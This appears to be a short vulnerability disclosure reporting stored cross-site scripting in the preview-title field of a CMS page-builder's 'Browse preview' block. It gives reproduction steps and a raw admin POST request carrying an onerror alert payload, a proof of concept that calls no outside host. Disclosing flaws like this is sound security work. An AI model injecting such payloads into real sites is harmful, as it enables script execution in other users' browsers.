There is accumulated XSS in the preview title of the page.
Step 1. Log in to the administrator screen and create a new page.
Step 2. Insert “Browse preview” from “Add new block” and specify Payload in “Preview title”.
Step 3. When you access the preview screen in the saved state, the embedded script (alert) will be executed.
<img src>
o:block[0][o:data][heading]
POST /admin/site/s/test/page/test HTTP/1.1
...
o%3Ais_public=1&sitepageform_csrf=f49b093285a9d1c137c456c725a74649-f2ddcd5a1ccc9cb264a38318182dd604&o%3Atitle=test&o%3Aslug=test&o%3Ablock%5B0%5D%5Bo%3Alayout%5D=browsePreview&o%3Ablock%5B0%5D%5Bo%3Adata%5D%5Bresource_type%5D=items&o%3Ablock%5B0%5D%5Bo%3Adata%5D%5Bquery%5D=&o%3Ablock%5B0%5D%5Bo%3Adata%5D%5Blimit%5D=12&o%3Ablock%5B0%5D%5Bo%3Adata%5D%5Bcomponents%5D%5B%5D=resource-heading&o%3Ablock%5B0%5D%5Bo%3Adata%5D%5Bcomponents%5D%5B%5D=resource-body&o%3Ablock%5B0%5D%5Bo%3Adata%5D%5Bcomponents%5D%5B%5D=thumbnail&o%3Ablock%5B0%5D%5Bo%3Adata%5D%5Bheading%5D=%3Cimg+src%3Dx+onerror%3Dalert%28document.domain%29%3E&o%3Ablock%5B0%5D%5Bo%3Adata%5D%5Blink-text%5D=Browse+all
https://drive.google.com/file/d/1PIReOl9qiJBUqw9522ctxrHGBvn8JUOI/view?usp=sharing